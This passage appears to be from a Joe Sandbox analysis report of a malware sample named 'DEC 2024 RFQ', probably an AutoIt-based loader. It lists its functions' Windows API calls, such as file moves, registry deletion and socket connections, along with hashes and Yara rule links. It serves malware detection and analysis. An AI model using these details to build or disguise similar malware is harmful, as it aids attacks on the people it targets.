                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 87235514-0
                                                                                                                      • Opcode ID: 273162ca3bb3da2b8212c5dc1a72b12f02673b132e386e0d01fcc2e11811d75d
                                                                                                                      • Instruction ID: e32986d5effad549a0aa5fd68798417991e0986487ba3059d82d69205ea05051
                                                                                                                      • Opcode Fuzzy Hash: 273162ca3bb3da2b8212c5dc1a72b12f02673b132e386e0d01fcc2e11811d75d
                                                                                                                      • Instruction Fuzzy Hash: F351E4A06047D63DFBB2A7748C45BBA7EE97F06300F088889E1D48A8C3C395AC9DD750
                                                                                                                      Function 000855FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsncpy$LocalTime
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2945705084-0
                                                                                                                      • Opcode ID: 82ec2e9cf89d8761e52bf60771b4b209817d484614148cb905c9999a0dd331d4
                                                                                                                      • Instruction ID: cf6c48629a6cbd323b23044a2fd4ffc3efaee1df379017cd714ee2169b82f4c1
                                                                                                                      • Opcode Fuzzy Hash: 82ec2e9cf89d8761e52bf60771b4b209817d484614148cb905c9999a0dd331d4
                                                                                                                      • Instruction Fuzzy Hash: 844160A5C1061476CB11FBB48C46ACFB3A8EF05310F509966F558E3222EB34A755C7EA
                                                                                                                      Function 00083671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0008466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00083697,?), ref: 0008468B
                                                                                                                        • Part of subcall function 0008466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00083697,?), ref: 000846A4
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 000836B7
                                                                                                                      • _wcscmp.LIBCMT ref: 000836D3
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 000836EB
                                                                                                                      • _wcscat.LIBCMT ref: 00083733
                                                                                                                      • SHFileOperationW.SHELL32(?), ref: 0008379F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 1377345388-1173974218
                                                                                                                      • Opcode ID: 1917bd41478c06093c28c7f354001f88b4c444e1edcd669750cc24c51eac2900
                                                                                                                      • Instruction ID: 487ebcf66d4f4b3e51a01f82cf3bde860b4b40c9d96628ed8d3d3526253fcb1c
                                                                                                                      • Opcode Fuzzy Hash: 1917bd41478c06093c28c7f354001f88b4c444e1edcd669750cc24c51eac2900
                                                                                                                      • Instruction Fuzzy Hash: A141AEB1508345AAC762FF64D441ADFB7E8BF89780F00082EB4CAC7252EA34D689C756
                                                                                                                      Function 000A7291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 000A72AA
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000A7351
                                                                                                                      • IsMenu.USER32(?), ref: 000A7369
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 000A73B1
                                                                                                                      • DrawMenuBar.USER32 ref: 000A73C4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 3866635326-4108050209
                                                                                                                      • Opcode ID: a61480c3217a500df1cd81276eb0ef4cd4a4cc703ffdf38c2af5ab97aaf00a20
                                                                                                                      • Instruction ID: 9bff109897e564592c63a288f73c9f4a5fd4f8c55b65d6fa97a8cbc20b54476f
                                                                                                                      • Opcode Fuzzy Hash: a61480c3217a500df1cd81276eb0ef4cd4a4cc703ffdf38c2af5ab97aaf00a20
                                                                                                                      • Instruction Fuzzy Hash: 6C412876A04609EFDF20DF90D884AAABBF8FF06314F158429FD49AB250D730AE54DB50
                                                                                                                      Function 000A0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 000A0FD4
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000A0FFE
                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 000A10B5
                                                                                                                        • Part of subcall function 000A0FA5: RegCloseKey.ADVAPI32(?), ref: 000A101B
                                                                                                                        • Part of subcall function 000A0FA5: FreeLibrary.KERNEL32(?), ref: 000A106D
                                                                                                                        • Part of subcall function 000A0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 000A1090
                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 000A1058
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 395352322-0
                                                                                                                      • Opcode ID: 1033e5780dbabd63760893ded9d59177842fd1f0712914bc23aa730592567caa
                                                                                                                      • Instruction ID: 1fbe1f01a8adf3d62456e8cc92c334127a0d56d7ffceeef20686218e5d5b80cb
                                                                                                                      • Opcode Fuzzy Hash: 1033e5780dbabd63760893ded9d59177842fd1f0712914bc23aa730592567caa
                                                                                                                      • Instruction Fuzzy Hash: A0310DB1901109BFEB159FD0DC89EFFB7BCEF09350F000169E511E2151EA749E859AA4
                                                                                                                      Function 000A62CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 000A62EC
                                                                                                                      • GetWindowLongW.USER32(016F5690,000000F0), ref: 000A631F
                                                                                                                      • GetWindowLongW.USER32(016F5690,000000F0), ref: 000A6354
                                                                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 000A6386
                                                                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 000A63B0
                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 000A63C1
                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 000A63DB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LongWindow$MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2178440468-0
                                                                                                                      • Opcode ID: 0a124366ab977ea840bc0979843755348bf043956fdb2406ff732235d62bb505
                                                                                                                      • Instruction ID: 4ed6a85b02ec01da4d0038bba5d80007e6b9d3542e6dbe289e94130845d6c6f9
                                                                                                                      • Opcode Fuzzy Hash: 0a124366ab977ea840bc0979843755348bf043956fdb2406ff732235d62bb505
                                                                                                                      • Instruction Fuzzy Hash: 09313436640541EFEB20CF98DC84F6937F1FB4A714F1901A4F511AF2B2CB76A9419B50
                                                                                                                      Function 0007DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0007DB2E
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0007DB54
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0007DB57
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0007DB75
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0007DB7E
                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0007DBA3
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0007DBB1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3761583154-0
                                                                                                                      • Opcode ID: 3bb211673ef11915f66767d2fdf90962c12acaf8e9edaf8a4e3d46fa4f68cb02
                                                                                                                      • Instruction ID: f4de0782a57959cc18591ef26c98be937dabebe4da75d8f15a937a430a1522ba
                                                                                                                      • Opcode Fuzzy Hash: 3bb211673ef11915f66767d2fdf90962c12acaf8e9edaf8a4e3d46fa4f68cb02
                                                                                                                      • Instruction Fuzzy Hash: 45217176A00219AFEB10AFB9DC84CBB73ECEF09360B018566F918DB251D7789C418768
                                                                                                                      Function 00096173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00097D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00097DB6
                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 000961C6
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 000961D5
                                                                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0009620E
                                                                                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00096217
                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00096221
                                                                                                                      • closesocket.WSOCK32(00000000), ref: 0009624A
                                                                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00096263
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 910771015-0
                                                                                                                      • Opcode ID: 83124746765d85591719afc3f079e3bfd05610e23d2e2b2ae350e38eb9ad0951
                                                                                                                      • Instruction ID: ed753c059357eede07dd81e51917cdf9008b791da33fc37ea180ba95520a00a5
                                                                                                                      • Opcode Fuzzy Hash: 83124746765d85591719afc3f079e3bfd05610e23d2e2b2ae350e38eb9ad0951
                                                                                                                      • Instruction Fuzzy Hash: 9731B331600518AFEF10AF64DC85BBE77ACEF45750F044069FD05A7292DB75AC049BA1
                                                                                                                      Function 0007F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                      • API String ID: 1038674560-2734436370
                                                                                                                      • Opcode ID: f56f8afe9bfb379017c5850cf394ef8cb537599d196116afc0f06b70433c8253
                                                                                                                      • Instruction ID: 563310585fbc2dbb7bfdb56927253f49c59926ae10359eaf5ff92d23293b2be0
                                                                                                                      • Opcode Fuzzy Hash: f56f8afe9bfb379017c5850cf394ef8cb537599d196116afc0f06b70433c8253
                                                                                                                      • Instruction Fuzzy Hash: BE216BB2A0851366D234B634AC02EFB73D8EF55340F10C039F98A8B092EB699D41D39D
                                                                                                                      Function 0007DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0007DC09
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0007DC2F
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0007DC32
                                                                                                                      • SysAllocString.OLEAUT32 ref: 0007DC53
                                                                                                                      • SysFreeString.OLEAUT32 ref: 0007DC5C
                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0007DC76
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0007DC84
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3761583154-0
                                                                                                                      • Opcode ID: 959dabb19ccafbf4c098977b5b012a360e6c0674d0c5aaa21363b5eeee984d9d
                                                                                                                      • Instruction ID: 48cee972806f692647e29eeaf587236843bc1ac5531a9327df1732a346e291c3
                                                                                                                      • Opcode Fuzzy Hash: 959dabb19ccafbf4c098977b5b012a360e6c0674d0c5aaa21363b5eeee984d9d
                                                                                                                      • Instruction Fuzzy Hash: 32213375604205AFEB10ABE8DC88DBA77ECEF09360B10C126F918CB261D678DC41D768
                                                                                                                      Function 000A75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00021D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00021D73
                                                                                                                        • Part of subcall function 00021D35: GetStockObject.GDI32(00000011), ref: 00021D87
                                                                                                                        • Part of subcall function 00021D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00021D91
                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 000A7632
                                                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 000A763F
                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 000A764A
                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 000A7659
                                                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 000A7665
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                                      • Opcode ID: 9c7cc23c757cf7fba90e763a27f251471cab5e423e869d266611a78e37c4263b
                                                                                                                      • Instruction ID: cc422d2bccd1c95d6fae7faa7a815965acb784d9da992680927fe331181c5329
                                                                                                                      • Opcode Fuzzy Hash: 9c7cc23c757cf7fba90e763a27f251471cab5e423e869d266611a78e37c4263b
                                                                                                                      • Instruction Fuzzy Hash: 4211C8B1110219BFEF158FA4CC85EE77F5DEF09798F014115B708A6051C7729C21DBA4
                                                                                                                      Function 00049AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __init_pointers.LIBCMT ref: 00049AE6
                                                                                                                        • Part of subcall function 00043187: EncodePointer.KERNEL32(00000000), ref: 0004318A
                                                                                                                        • Part of subcall function 00043187: __initp_misc_winsig.LIBCMT ref: 000431A5
                                                                                                                        • Part of subcall function 00043187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00049EA0
                                                                                                                        • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00049EB4
                                                                                                                        • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00049EC7
                                                                                                                        • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00049EDA
                                                                                                                        • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00049EED
                                                                                                                        • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00049F00
                                                                                                                        • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00049F13
                                                                                                                        • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00049F26
                                                                                                                        • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00049F39
                                                                                                                        • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00049F4C
                                                                                                                        • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00049F5F
                                                                                                                        • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00049F72
                                                                                                                        • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00049F85
                                                                                                                        • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00049F98
                                                                                                                        • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00049FAB
                                                                                                                        • Part of subcall function 00043187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00049FBE
                                                                                                                      • __mtinitlocks.LIBCMT ref: 00049AEB
                                                                                                                      • __mtterm.LIBCMT ref: 00049AF4
                                                                                                                        • Part of subcall function 00049B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00049AF9,00047CD0,000DA0B8,00000014), ref: 00049C56
                                                                                                                        • Part of subcall function 00049B5C: _free.LIBCMT ref: 00049C5D
                                                                                                                        • Part of subcall function 00049B5C: DeleteCriticalSection.KERNEL32(000DEC00,?,?,00049AF9,00047CD0,000DA0B8,00000014), ref: 00049C7F
                                                                                                                      • __calloc_crt.LIBCMT ref: 00049B19
                                                                                                                      • __initptd.LIBCMT ref: 00049B3B
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00049B42
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3567560977-0
                                                                                                                      • Opcode ID: 15e6b4ff9f9d142de6e57210c65bc943d451d60bbb7cf50341cca8a7ef5bac3c
                                                                                                                      • Instruction ID: ecebf1da292f74ce1a54f906f7c40279efef5a3dd7770faf151a0511928b1e32
                                                                                                                      • Opcode Fuzzy Hash: 15e6b4ff9f9d142de6e57210c65bc943d451d60bbb7cf50341cca8a7ef5bac3c
                                                                                                                      • Instruction Fuzzy Hash: B1F06DB250A7126AE674B674BC03ACB26D0DF02734B214A3AF860890D3EF20844141ED
                                                                                                                      Function 0004406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00043F85), ref: 00044085
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0004408C
                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 00044097
                                                                                                                      • DecodePointer.KERNEL32(00043F85), ref: 000440B2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                      • String ID: RoUninitialize$combase.dll
                                                                                                                      • API String ID: 3489934621-2819208100
                                                                                                                      • Opcode ID: 599ec97806e7b444b2a834f83ac3cfcf206cec9e054302cb5f6be3a728d42d30
